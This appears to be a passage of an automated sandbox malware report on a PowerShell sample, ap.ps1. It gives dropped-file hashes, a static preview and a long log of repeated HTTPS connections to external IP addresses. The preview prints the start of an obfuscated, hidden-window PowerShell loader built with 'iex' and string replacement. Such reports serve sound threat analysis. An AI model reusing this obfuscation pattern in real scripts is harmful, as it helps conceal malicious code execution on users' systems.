                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0wjudqg.dze.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yg1zmnm2.jh0.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6220
                                                                          Entropy (8bit):3.734735622462757
                                                                          Encrypted:false
                                                                          SSDEEP:48:ykA9VROCgmoU2f9PukvhkvklCywdgA9J22lLcSogZoCg9J22lMcSogZom1:q/OCgi4gkvhkvCCtP9J22PH49J22GHp
                                                                          MD5:987A4C5389A76B6003ADA26F9739857E
                                                                          SHA1:59956598CEB790E0B0C68AC93EA1DC88662C3077
                                                                          SHA-256:99C2600F5F990145D3C32BC05627CD908B5023A78B5B800078C23257AC8B5E9B
                                                                          SHA-512:F04B0083CE3DD1618B37F599CFD176511625657BA37648C6FDE055E43D2E3AC6232182B1F7F668402267D6481262F90FF3099CC0B4963177D88FB47827425DB2
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ....N.5q....u..F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q...|....F.......F......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.L...........................c..A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EW)N.Y.L............................'.R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.L..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.L...........................h..W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.L....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.L....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.L................

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5NEDETGGCYCULE1UST95.temp

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6220
                                                                          Entropy (8bit):3.734735622462757
                                                                          Encrypted:false
                                                                          SSDEEP:48:ykA9VROCgmoU2f9PukvhkvklCywdgA9J22lLcSogZoCg9J22lMcSogZom1:q/OCgi4gkvhkvCCtP9J22PH49J22GHp
                                                                          MD5:987A4C5389A76B6003ADA26F9739857E
                                                                          SHA1:59956598CEB790E0B0C68AC93EA1DC88662C3077
                                                                          SHA-256:99C2600F5F990145D3C32BC05627CD908B5023A78B5B800078C23257AC8B5E9B
                                                                          SHA-512:F04B0083CE3DD1618B37F599CFD176511625657BA37648C6FDE055E43D2E3AC6232182B1F7F668402267D6481262F90FF3099CC0B4963177D88FB47827425DB2
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ....N.5q....u..F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q...|....F.......F......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.L...........................c..A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EW)N.Y.L............................'.R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.L..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.L...........................h..W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.L....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.L....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.L................

                                                                          Static File Info

                                                                          General

                                                                          File type:ASCII text, with very long lines (825), with no line terminators
                                                                          Entropy (8bit):5.30523720267272
                                                                          TrID:
                                                                            File name:ap.ps1
                                                                            File size:825 bytes
                                                                            MD5:fd4a7beeefde4074f9d7c04832560ccc
                                                                            SHA1:2750778b94a0797a87f488673043db54691043b2
                                                                            SHA256:585a089fb20209a3de1a3e87799320174f90336e92c256eb4e789428f306ceee
                                                                            SHA512:b1019b295aef7ba258ad8c4f103d21ed821533666a578459d1ccd2c37b918cf8cd918b73b5e8388318e8d1e6c8979f72b4d0e9db195e371f20835c744e036eae
                                                                            SSDEEP:24:XOaOiLoOiIjWIXfYNLqwYKxhQWAa6Kzqy1zoKlRGA:+FmnjKIPdwYW8KzqyVoKl7
                                                                            TLSH:C2014645D29742F71550B54221C4463D31378E3565C604F3B5F9415B30BCB7D0CC2536
                                                                            File Content Preview:powershell -win hidden $oz30ep=iex($('[Environment]::GetEjnds'''.Replace('jnd','nvironmentVariable(''public'') + ''\\utwxgh.vb')));$flol=iex($('[Environment]::GetEjnds'''.Replace('jnd','nvironmentVariable(''public'') + ''\\sz3.vb')));function getit([strin

                                                                            File Icon

                                                                            Icon Hash:3270d6baae77db44

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 5, 2024 10:39:24.204157114 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:24.204204082 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:24.204309940 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:24.212845087 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:24.212882042 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:25.662364960 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:25.662435055 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:25.665817976 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:25.665831089 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:25.666110992 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:25.673240900 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:25.719331026 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.395484924 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.395509958 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.395585060 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.395621061 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.443789005 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.495650053 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.495676041 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.495753050 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.495780945 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.537559986 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.588696957 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.588713884 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.588748932 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.588788033 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.588836908 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.622114897 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.622124910 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.622195959 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.622225046 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.647461891 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.647507906 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.647552967 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.647578955 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.647598982 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.691713095 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.691724062 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.691802025 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.691817045 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.740711927 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.775782108 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.775798082 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.775834084 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.775866985 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.775914907 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.790427923 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.790447950 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.790473938 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.790505886 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.790555000 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.790570021 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.804166079 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.804177046 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.804266930 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.804307938 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.822531939 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.822544098 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.822566986 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.822597980 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.822653055 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.822670937 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.836256027 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.836272001 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.836337090 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.836383104 CET4434972893.95.216.175192.168.2.10
                                                                            Dec 5, 2024 10:39:26.836402893 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:26.850991964 CET49728443192.168.2.1093.95.216.175
                                                                            Dec 5, 2024 10:39:27.298813105 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:27.298856974 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:27.298929930 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:27.299273014 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:27.299285889 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:28.563709021 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:28.563767910 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:28.565500021 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:28.565558910 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:28.565817118 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:28.566786051 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:28.607335091 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.015261889 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.068785906 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:29.068809032 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.115669012 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:29.135026932 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.135041952 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.135073900 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.135086060 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.135102987 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.135109901 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:29.135154963 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:29.135162115 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.178173065 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:29.241986990 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.241997004 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.242038965 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.242057085 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:29.242058039 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.242085934 CET4434974191.193.42.13192.168.2.10
                                                                            Dec 5, 2024 10:39:29.242089987 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:29.242108107 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:29.242131948 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:29.243098021 CET49741443192.168.2.1091.193.42.13
                                                                            Dec 5, 2024 10:39:31.348669052 CET49754443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:31.348731995 CET44349754184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:31.348800898 CET49754443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:31.352113962 CET49754443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:31.352133036 CET44349754184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:32.618984938 CET44349754184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:32.619072914 CET49754443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:32.621857882 CET49754443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:32.621867895 CET44349754184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:32.622222900 CET44349754184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:32.628407001 CET49754443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:32.675335884 CET44349754184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:33.072896957 CET44349754184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:33.073005915 CET44349754184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:33.073291063 CET49754443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:33.122632027 CET49754443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:37.445594072 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:37.445658922 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:37.445729017 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:37.445940018 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:37.445957899 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:38.898121119 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:38.899344921 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:38.899390936 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:39.457071066 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:39.457144022 CET44349770184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:39.457206964 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:39.489562035 CET49770443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:43.877756119 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:43.877800941 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:43.877934933 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:43.878205061 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:43.878221989 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.281986952 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.282113075 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:45.283813953 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:45.283823967 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.284164906 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.285386086 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:45.331326008 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.816879988 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.817043066 CET44349784148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:45.817248106 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:45.817928076 CET49784443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:49.837507010 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:49.837544918 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:49.837673903 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:49.837853909 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:49.837862015 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:51.099077940 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:51.100222111 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:51.100229979 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:51.559261084 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:51.559328079 CET44349797184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:39:51.559391975 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:51.559808016 CET49797443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:39:55.556087971 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:55.556135893 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:55.556216955 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:55.556452990 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:55.556463957 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:56.963556051 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:56.966474056 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:56.966505051 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:57.506086111 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:57.506289005 CET44349813148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:39:57.506663084 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:39:57.507050991 CET49813443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:01.509810925 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:01.509859085 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:01.509946108 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:01.510163069 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:01.510174036 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:02.770351887 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:02.771545887 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:02.771576881 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:03.229753017 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:03.229837894 CET44349828184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:03.230104923 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:03.230242014 CET49828443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:07.264461994 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:07.264503956 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:07.264576912 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:07.264911890 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:07.264931917 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:08.665762901 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:08.666784048 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:08.666795969 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:09.213222027 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:09.213406086 CET44349841148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:09.213479042 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:09.213911057 CET49841443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:13.212879896 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:13.212938070 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:13.213023901 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:13.213244915 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:13.213255882 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:14.474863052 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:14.495172977 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:14.495213985 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:14.936309099 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:14.936382055 CET44349857184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:14.936446905 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:14.936985970 CET49857443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:18.947104931 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:18.947170973 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:18.947280884 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:18.947531939 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:18.947546959 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:20.345973969 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:20.347219944 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:20.347248077 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:20.891455889 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:20.891720057 CET44349872148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:20.891890049 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:20.892365932 CET49872443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:24.931499958 CET49885443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:24.931540966 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:24.931632996 CET49885443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:24.931859970 CET49885443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:24.931874990 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:26.193947077 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:26.195274115 CET49885443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:26.195297003 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:26.658943892 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:26.659003973 CET44349885184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:26.659077883 CET49885443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:26.659545898 CET49885443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:30.665685892 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:30.665740013 CET44349900148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:30.665868998 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:30.666071892 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:30.666090012 CET44349900148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:32.062766075 CET44349900148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:32.063942909 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:32.063990116 CET44349900148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:32.607696056 CET44349900148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:32.607884884 CET44349900148.251.114.233192.168.2.10
